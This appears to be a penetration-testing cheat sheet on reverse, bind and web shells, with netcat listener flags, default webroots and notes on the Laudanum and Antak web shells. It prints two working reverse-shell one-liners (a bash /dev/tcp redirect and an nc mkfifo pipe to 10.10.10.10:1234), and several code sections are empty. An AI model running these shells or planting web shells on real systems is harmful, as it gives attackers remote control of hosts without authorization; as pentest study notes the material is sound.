Reverse Shells + Bind + Web

Listen

  • Typical netcat

    • -l listen

    • -v verbose

    • -n No DNs resolution

    • -p <port> port

Payloads

More at PayloadAllTheThings

Also at HighOn.Coffee

great one: https://www.revshells.com/

Bash

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Powershell


Sanitization/Stabilization/Upgrading TTY

After connecting, often the shell is unstable and can be weird to use.

Then CTRL + Z to go back to local shell

Then we should have a stable shell but not using all screen.

On a local shell:

On remote shell:


Bind Shell

Bash

Python

Powershell


Web shell

This is also covered in File Inclusion

PHP

JSP

ASP

Default webroots:

Web Server
Default Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot\

XAMPP

C:\xampp\htdocs\

ASP shells

Laudanum, One Webshell to Rule Them All

You can get it here. Laudanum is built into Parrot OS and Kali by default.

The Laudanum files can be found in the /usr/share/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your attacking host IP address

Add your IP address to the allowedIps variable on line 59.

Antak Webshell

Antak is a web shell built-in ASP.Net included within the Nishang project. Nishang is an Offensive PowerShell toolset that can provide options for any portion of your pentest.

Modify the file

PHP Shells

WhiteWinterWolf

Considerations when Dealing with Web Shells

When utilizing web shells, consider the below potential issues that may arise during your penetration testing process:

  • Web applications sometimes automatically delete files after a pre-defined period

  • Limited interactivity with the operating system in terms of navigating the file system, downloading and uploading files, chaining commands together may not work (ex. whoami && hostname), slowing progress, especially when performing enumeration -Potential instability through a non-interactive web shell

  • Greater chance of leaving behind proof that we were successful in our attack

Last updated